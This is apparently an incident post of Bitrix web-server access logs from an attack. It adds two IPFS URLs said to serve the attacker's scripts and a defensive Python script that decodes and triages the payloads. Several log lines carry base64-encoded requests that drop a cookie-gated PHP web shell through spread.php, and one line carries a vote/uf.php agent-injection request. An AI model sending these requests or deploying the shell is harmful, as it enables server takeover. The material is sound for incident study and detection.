127.0.0.1 - - [02/Feb/2024:01:03:57 +0300] "GET /bitrix/tools/spread.php?state=MD1zeXN0ZW0mMT1lY2hvIFBEOXdhSEFnWldOb2J5QTBNRGszTWpNcU1qQTdhV1lvYldRMUtDUmZRMDlQUzBsRlcyUmRLVDA5SWpFM01ESTRaalE0TjJOaU1tRTRORFl3TnpZME5tUmhNMkZrTXpnM09HVmpJaWw3WldOb2J5SnZheUk3WlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NSZlVrVlJWVVZUVkZ0cFpGMHBLVHRwWmlna1gxQlBVMVJiSW5Wd0lsMDlQU0oxY0NJcGUwQmpiM0I1S0NSZlJrbE1SVk5iSW1acGJHVWlYVnNpZEcxd1gyNWhiV1VpWFN3a1gwWkpURVZUV3lKbWFXeGxJbDFiSW01aGJXVWlYU2s3ZlgwL1BnPT18YmFzZTY0IC1kfCB0ZWUgLi4vLi4vZjE5NWJmMjVjM2IwLnBocCYyPQ== HTTP/1.0" 404 1284415 "https://***.ru/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
127.0.0.1 - - [02/Feb/2024:01:04:06 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281052 "https://***.ru/bitrix/tools/spread.php?state=MD1zeXN0ZW0mMT1lY2hvIFBEOXdhSEFnWldOb2J5QTBNRGszTWpNcU1qQTdhV1lvYldRMUtDUmZRMDlQUzBsRlcyUmRLVDA5SWpFM01ESTRaalE0TjJOaU1tRTRORFl3TnpZME5tUmhNMkZrTXpnM09HVmpJaWw3WldOb2J5SnZheUk3WlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NSZlVrVlJWVVZUVkZ0cFpGMHBLVHRwWmlna1gxQlBVMVJiSW5Wd0lsMDlQU0oxY0NJcGUwQmpiM0I1S0NSZlJrbE1SVk5iSW1acGJHVWlYVnNpZEcxd1gyNWhiV1VpWFN3a1gwWkpURVZUV3lKbWFXeGxJbDFiSW01aGJXVWlYU2s3ZlgwL1BnPT18YmFzZTY0IC1kfCB0ZWUgLi4vLi4vZjE5NWJmMjVjM2IwLnBocCYyPQ==" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
127.0.0.1 - - [02/Feb/2024:01:04:16 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281052 "https://***.ru/bitrix/tools/spread.php?state=MD1maWxlX3B1dF9jb250ZW50cyYxPS4uLy4uL2YxOTViZjI1YzNiMC5waHAmMj08P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbZF0pPT0iMTcwMjhmNDg3Y2IyYTg0NjA3NjQ2ZGEzYWQzODc4ZWMiKXtlY2hvIm9rIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUW2lkXSkpO2lmKCRfUE9TVFsidXAiXT09InVwIil7QGNvcHkoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLCRfRklMRVNbImZpbGUiXVsibmFtZSJdKTt9fT8+" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
127.0.0.1 - - [02/Feb/2024:12:39:55 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281053 "https://***.ru/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2676.61 Safari/537.36"
127.0.0.1 - - [02/Feb/2024:12:39:56 +0300] "POST / HTTP/1.0" 200 1300319 "https://***.ru/f195bf25c3b0.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2676.61 Safari/537.36"
127.0.0.1 - - [02/Feb/2024:12:39:57 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281053 "https://***.ru/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2676.61 Safari/537.36"
127.0.0.1 - - [02/Feb/2024:12:39:57 +0300] "GET /bitrix/tools/public_session.php?k=65db82d9eaa83fa0ee8c7decd966de68.05df8708f26c0732dd499715072467cf3fa127200bf9cefd4425ce948b4589f4 HTTP/1.0" 200 2 "https://***.ru/bitrix/admin/iblock_element_edit.php?IBLOCK_ID=45&type=catalog_tehno&ID=1170986&lang=ru&find_section_section=0&form_element_45_active_tab=edit1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 YaBrowser/24.1.0.0 Safari/537.36"
127.0.0.1 - - [02/Feb/2024:21:06:44 +0300] "GET /bitrix/tools/composite_data.php HTTP/1.0" 200 317 "https://***.ru/" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
127.0.0.1 - - [02/Feb/2024:21:06:44 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/composite_data.php" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
127.0.0.1 - - [02/Feb/2024:21:06:44 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
127.0.0.1 - - [02/Feb/2024:21:06:44 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
127.0.0.1 - - [02/Feb/2024:21:06:45 +0300] "POST /bitrix/tools/accesson.php HTTP/1.0" 404 1281310 "https://***.ru/" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
127.0.0.1 - - [02/Feb/2024:21:06:45 +0300] "POST /bitrix/tools/f195bf25c3b0.php HTTP/1.0" 404 1281342 "https://***.ru/bitrix/tools/accesson.php" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
127.0.0.1 - - [02/Feb/2024:21:26:31 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [02/Feb/2024:21:26:32 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [02/Feb/2024:21:26:32 +0300] "GET / HTTP/1.0" 200 1291256 "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [02/Feb/2024:21:26:32 +0300] "POST /accesson.php HTTP/1.0" 404 1281448 "https://***.ru/" "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [02/Feb/2024:21:26:33 +0300] "POST /f195bf25c3b0.php HTTP/1.0" 404 1281480 "https://***.ru/accesson.php" "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [03/Feb/2024:07:48:29 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281053 "https://***.ru/bitrix/tools/spread.php?state=MD1zeXN0ZW0mMT1lY2hvIFBEOXdhSEFnWldOb2J5QTBNRGszTWpNcU1qQTdhV1lvYldRMUtDUmZRMDlQUzBsRlcyUmRLVDA5SWpFM01ESTRaalE0TjJOaU1tRTRORFl3TnpZME5tUmhNMkZrTXpnM09HVmpJaWw3WldOb2J5SnZheUk3WlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NSZlVrVlJWVVZUVkZ0cFpGMHBLVHRwWmlna1gxQlBVMVJiSW5Wd0lsMDlQU0oxY0NJcGUwQmpiM0I1S0NSZlJrbE1SVk5iSW1acGJHVWlYVnNpZEcxd1gyNWhiV1VpWFN3a1gwWkpURVZUV3lKbWFXeGxJbDFiSW01aGJXVWlYU2s3ZlgwL1BnPT18YmFzZTY0IC1kfCB0ZWUgLi4vLi4vZjE5NWJmMjVjM2IwLnBocCYyPQ==" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.12 Safari/537.36"
127.0.0.1 - - [03/Feb/2024:07:48:52 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281053 "https://***.ru/bitrix/tools/spread.php?state=MD1maWxlX3B1dF9jb250ZW50cyYxPS4uLy4uL2YxOTViZjI1YzNiMC5waHAmMj08P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbZF0pPT0iMTcwMjhmNDg3Y2IyYTg0NjA3NjQ2ZGEzYWQzODc4ZWMiKXtlY2hvIm9rIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUW2lkXSkpO2lmKCRfUE9TVFsidXAiXT09InVwIil7QGNvcHkoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLCRfRklMRVNbImZpbGUiXVsibmFtZSJdKTt9fT8+" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.12 Safari/537.36"
127.0.0.1 - - [03/Feb/2024:18:56:52 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281726 "https://***.ru/" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2944.93 Safari/537.36"
127.0.0.1 - - [03/Feb/2024:18:56:53 +0300] "GET /bitrix/tools/composite_data.php HTTP/1.0" 200 317 "https://***.ru/f195bf25c3b0.php" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2944.93 Safari/537.36"
127.0.0.1 - - [03/Feb/2024:18:56:53 +0300] "POST /bitrix/tools/vote/uf.php?attachId[ENTITY_TYPE]=CFileUploader&attachId[ENTITY_ID][events][onFileIsStarted][]=CAllAgent&attachId[ENTITY_ID][events][onFileIsStarted][]=Update&attachId[MODULE_ID]=vote&action=vote HTTP/1.0" 404 1283016 "https://***.ru/bitrix/tools/composite_data.php" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2944.93 Safari/537.36"
127.0.0.1 - - [03/Feb/2024:21:51:38 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281725 "https://***.ru/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2879.32 Safari/537.36"
127.0.0.1 - - [03/Feb/2024:21:51:39 +0300] "POST / HTTP/1.0" 200 1300991 "https://***.ru/f195bf25c3b0.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2879.32 Safari/537.36"
127.0.0.1 - - [03/Feb/2024:21:51:39 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281725 "https://***.ru/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2879.32 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:08:35 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/composite_data.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:08:37 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:08:42 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:08:42 +0300] "GET / HTTP/1.0" 200 1290581 "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:08:43 +0300] "POST /bitrix/tools/f195bf25c3b0.php HTTP/1.0" 404 1280669 "https://***.ru/bitrix/tools/accesson.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:11:58 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/composite_data.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2895.22 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:12:10 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2895.22 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:12:10 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2895.22 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:12:10 +0300] "GET / HTTP/1.0" 200 1290581 "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2895.22 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:12:12 +0300] "POST /accesson.php HTTP/1.0" 404 1280774 "https://***.ru/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2895.22 Safari/537.36"
127.0.0.1 - - [04/Feb/2024:05:12:34 +0300] "POST /f195bf25c3b0.php HTTP/1.0" 404 1280806 "https://***.ru/accesson.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2895.22 Safari/537.36"
The script runs at a certain interval. Scripts are loaded from these links:
https://gateway.pinata.cloud/ipfs/QmeFQQveaX32GqrauAuj9uBqBGQbUB7NHcmr96aoeeiVV8
https://gateway.pinata.cloud/ipfs/QmQ9t1MbZnmEayTmcSqSyMiLNRCCiZiviWdNXYAhHDDVdZ
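The following is an added example, not part of the original post: a triage script that parses both access-log layouts shown above, decodes the base64 `state` value of `/bitrix/tools/spread.php` requests (the values in the post decode to `0=<PHP callable>&1=<arg>&2=<arg>`), and reports whether any `.php` name found in the first argument was ever served. The sample lines, host, IP, file name and payload body are constructed placeholders; the function names are assumptions of this example.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Front-end layout from the post: status comes before the request.
FRONT = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] (?P<status>\d{3}) '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" \S+ "(?P<ref>[^"]*)"')
# Back-end (combined) layout from the post: request comes before the status.
BACK = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+ "(?P<ref>[^"]*)"')
STATE = re.compile(r'[?&]state=([^&\s"]+)')
PHP_NAME = re.compile(r'[\w-]+\.php')
# PHP callables that write files or run code/commands.
WRITE_OR_EXEC = {"system", "exec", "passthru", "shell_exec", "eval",
                 "assert", "file_put_contents"}


def parse_line(line):
    """Parse one access-log line in either layout; None if it matches neither."""
    m = FRONT.match(line) or BACK.match(line)
    if not m:
        return None
    event = m.groupdict()
    event["status"] = int(event["status"])
    return event


def decode_state(text):
    """Decode a spread.php 'state' value found in a URL or a referer.

    Returns {index: value}, e.g. {0: callable, 1: arg, 2: arg}, or None.
    """
    if "spread.php" not in text:
        return None
    m = STATE.search(text)
    if not m:
        return None
    raw = unquote(m.group(1))  # not unquote_plus: '+' is a base64 character here
    try:
        plain = base64.b64decode(raw + "=" * (-len(raw) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None
    parts = re.split(r'(?:^|&)(\d+)=', plain.decode("utf-8", "replace"))
    return {int(k): v for k, v in zip(parts[1::2], parts[2::2])} or None


def basename(url):
    """Last path segment of a URL, ignoring the query string."""
    return url.split("?", 1)[0].rsplit("/", 1)[-1]


def triage(lines):
    """Map each file name targeted by a decoded 'state' payload to its evidence."""
    events = [e for e in map(parse_line, lines) if e]
    report = {}
    for e in events:
        for field in (e["url"], e["ref"]):
            state = decode_state(field)
            if not state or state.get(0) not in WRITE_OR_EXEC:
                continue
            for name in PHP_NAME.findall(state.get(1, "")):
                entry = report.setdefault(
                    name, {"callables": set(), "probes": [], "referred": []})
                entry["callables"].add(state[0])
    for e in events:
        if basename(e["url"]) in report:
            # Direct request for the targeted file: the status shows if it exists.
            report[basename(e["url"])]["probes"].append((e["method"], e["status"]))
        elif basename(e["ref"]) in report:
            # Request to another path that names the targeted file as referer.
            report[basename(e["ref"])]["referred"].append(
                (e["method"], e["url"], e["status"]))
    for entry in report.values():
        entry["served"] = any(status < 400 for _, status in entry["probes"])
    return report


def encode_state(plain):
    """Build a constructed 'state' value for the sample lines below."""
    return base64.b64encode(plain.encode()).decode()


# Constructed sample lines (placeholders, not values from the incident).
S = encode_state("0=file_put_contents&1=../../dropped0000.php&2=<?php /* placeholder */ ?>")
SAMPLE = [
    f'203.0.113.7 - - [03/Feb/2024:07:48:52 +0300 - 0.215] 404 "GET /bitrix/tools/spread.php?state={S} HTTP/1.1" 150741 "https://example.test/" "UA" "-"',
    f'203.0.113.7 - - [03/Feb/2024:07:48:53 +0300 - 0.216] 404 "GET /dropped0000.php HTTP/1.1" 149780 "https://example.test/bitrix/tools/spread.php?state={S}" "UA" "-"',
    f'127.0.0.1 - - [03/Feb/2024:07:48:53 +0300] "GET /dropped0000.php HTTP/1.0" 404 1281053 "https://example.test/bitrix/tools/spread.php?state={S}" "UA"',
    '127.0.0.1 - - [03/Feb/2024:21:51:39 +0300] "POST / HTTP/1.0" 200 1300991 "https://example.test/dropped0000.php" "UA"',
]

if __name__ == "__main__":
    for name, entry in triage(SAMPLE).items():
        print(name, sorted(entry["callables"]), "served:", entry["served"])
        print("  probes:", entry["probes"])
        print("  referred:", entry["referred"])
```

A `served` value of `False` only means that no direct request for that file name succeeded in the lines supplied; requests listed under `referred` with a 2xx status still need to be reviewed by hand.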